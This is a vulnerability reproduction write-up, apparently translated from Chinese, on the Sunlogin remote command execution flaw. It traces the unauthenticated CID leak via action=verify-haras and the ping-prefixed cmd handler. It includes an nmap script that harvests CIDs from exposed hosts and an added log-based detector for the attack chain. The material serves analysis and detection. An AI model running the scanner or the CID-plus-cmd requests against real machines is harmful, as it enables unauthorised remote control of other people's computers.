
Hacker Intrusion Penetration Testing & Sunlogin (向日葵) RCE Vulnerability Reproduction and Analysis



Reproduction reference: 太空老哥's "向日葵远程命令执行漏洞分析" (Sunlogin Remote Command Execution Vulnerability Analysis)

Reproduction environment

Affected versions: 11.x and earlier
Version reproduced against: 11.0.0.33162


Reproduction process

Three things are traced here: the check interface, the route that dispatches to it, and the authentication interface.
First, unpack the binary. Sunlogin is packed with UPX, so `upx -d` is enough to remove the packer.


To locate the service port, find the PID of the Sunlogin service process and then look up the port it is listening on.


Sunlogin starts this service when it launches; the port is assigned by the service and is not fixed. In practice Sunlogin's port falls in the 40000-50000 range.


According to the PDF, the CID must be obtained before the vulnerability can be exploited, so start by searching the binary's strings for "CID" (F12).


(Connect to Sunlogin once first; the CID then appears in the log at SunloginClient\log\sunlogin_service.<date>.log)


As described in the PDF, a request to /cgi-bin/rpc returns the CID without any authorization. (One level up the call chain is the router.)
(Too lazy to take a screenshot; the handler function is sub_140E1C954.)


When action=verify-haras is matched, the handler returns verify_string; comparing it against the CID shows that the two are identical.


When action is fast-login, the handler processes the identification code and the local verification code; after successful authentication the CID can be obtained this way as well.


Required parameters: action=fast-login&fastcode=<local identification code>&verify_string=<local verification code>&use_custom_password=1


The CID can also be obtained by authenticating through login.cgi.


Check interface: where the RCE is decided
After the cmd value is fetched, the code tests whether the ping command is present, then jumps to LABEL_27 and calls sub_140E20B64 to execute the command.


Authentication interface
Go back to the route lookup and follow it one level up (or search for the string {"success":false,"msg":"Verification failure"}).


Here you can see the check for whether the cookie exists, followed by the final comparison against the CID, which ultimately decides whether the CID (v13) is correct.


Further down that path there is a call into sub_14061D284 (this is the same route seen earlier).


nmap detection script:

-- NSE script: fingerprint the Sunlogin (向日葵) service by its unauthenticated
-- root response, then check whether /cgi-bin/rpc with action=verify-haras
-- hands out the CID without authentication.
local http=require "http"
local stdnse=require "stdnse"
local string=require "string"
local json=require "json"

-- Sunlogin picks a random high port (roughly 40000-50000), so the script
-- is tried against every open TCP port rather than a fixed one.
portrule=function(host,port)
        return port.state=="open" and port.protocol=="tcp"
end

action=function(host,port)
        local status=stdnse.output_table()
        local url=string.format("http://%s:%s",host.ip,port.number)
        -- An unauthenticated request to the root returns this fixed JSON body.
        local banner="{\"success\":false,\"msg\":\"Verification failure\"}"
        local headers={header={}}
        headers["header"]["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
        local rqt=http.get_url(url,headers)
        -- Plain (non-pattern) search, so no character in the banner is
        -- interpreted as a Lua pattern item.
        if not (rqt and rqt.status==200 and rqt.body and string.find(rqt.body,banner,1,true)) then
                return nil
        end
        status.banner="SunloginClient"
        -- verify-haras answers {"enabled":"1","verify_string":"<CID>"} with no
        -- authentication; the verify_string is the CID needed for the RCE.
        local uri="/cgi-bin/rpc"
        local postdata="action=verify-haras"
        local cid_check=http.post(host,port,uri,nil,true,postdata)
        if cid_check and cid_check.status==200 and cid_check.body then
                local ok,json_data=json.parse(cid_check.body)
                if ok and type(json_data)=="table" and json_data["enabled"]=="1" then
                        status.rce="YES"
                        status.cid=json_data["verify_string"]
                end
        end
        return status
end
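The scanner above looks at the vulnerability from the attacker's side. The following is an added example, not part of the original post and not Sunlogin code, that applies the same findings from the defender's side to HTTP access logs: an unauthenticated request to /cgi-bin/rpc with action=verify-haras discloses the CID, and a later request from the same client that carries a Cookie CID= value and a cmd parameter starting with ping reaches the command-executing check handler. The log line format, the client addresses, the CID values and the /check route are all constructed for the example (the post does not name the check interface's route). The post's scanner sends action in the POST body, which access logs normally do not record, so the sample log carries it in the query string.

```python
"""Detect the Sunlogin verify-haras -> CID -> cmd=ping chain in access logs.

Added example for this post, not Sunlogin code. The log format is
constructed: <client ip> "<method> <target> HTTP/1.1" <status> "<Cookie>".
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log. The /check route and the CID values are
# assumptions made for the example; the post names neither.
SAMPLE_LOG = """\
10.0.0.5 "GET / HTTP/1.1" 200 "-"
10.0.0.5 "GET /cgi-bin/rpc?action=verify-haras HTTP/1.1" 200 "-"
10.0.0.5 "GET /check?cmd=ping+127.0.0.1 HTTP/1.1" 200 "CID=4f3c9a1b"
10.0.0.9 "POST /cgi-bin/rpc?action=fast-login&fastcode=123456789&verify_string=abcd&use_custom_password=1 HTTP/1.1" 200 "-"
10.0.0.9 "GET /check?cmd=ping+127.0.0.1 HTTP/1.1" 200 "CID=77aa55ee"
10.0.0.7 "GET /cgi-bin/rpc?action=verify-haras HTTP/1.1" 200 "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)


def parse_line(line):
    """Split one log line into ip, method, path, query dict, status and cookie dict."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    parts = urlsplit(m["target"])
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    cookies = {}
    for piece in m["cookie"].split(";"):
        if "=" in piece:
            name, value = piece.strip().split("=", 1)
            cookies[name] = value
    return {"ip": m["ip"], "method": m["method"], "path": parts.path,
            "status": int(m["status"]), "query": query, "cookies": cookies}


def analyze(log_text):
    """Return {client_ip: [finding, ...]} for the Sunlogin exploitation chain.

    cid_leak : a 200 response to /cgi-bin/rpc with action=verify-haras, which
               the post shows returning verify_string (the CID) unauthenticated.
    rce_chain: the same client, never having logged in through login.cgi or
               fast-login, later sends a cmd parameter beginning with ping
               together with a CID cookie, i.e. reaches the check handler
               that executes the command.
    """
    findings = defaultdict(list)
    state = defaultdict(lambda: {"leaked": False, "logged_in": False})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        st = state[rec["ip"]]
        action = rec["query"].get("action", "")
        if rec["path"] == "/cgi-bin/rpc" and action == "verify-haras" and rec["status"] == 200:
            st["leaked"] = True
            findings[rec["ip"]].append("cid_leak")
        elif rec["path"].endswith("login.cgi") or action == "fast-login":
            st["logged_in"] = True
        cmd = rec["query"].get("cmd", "")
        if cmd.startswith("ping") and "CID" in rec["cookies"] and st["leaked"] and not st["logged_in"]:
            findings[rec["ip"]].append("rce_chain")
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(hits))
```

A client that authenticated through login.cgi or fast-login is not flagged, because an authenticated session legitimately carries a CID; a client that pulled the CID out of verify-haras and then issued a ping command without any login is reported as rce_chain. This is a heuristic over whatever the proxy or host actually logs: it cannot see the verify_string in the response body, so it correlates on source address and request order rather than on the CID value itself.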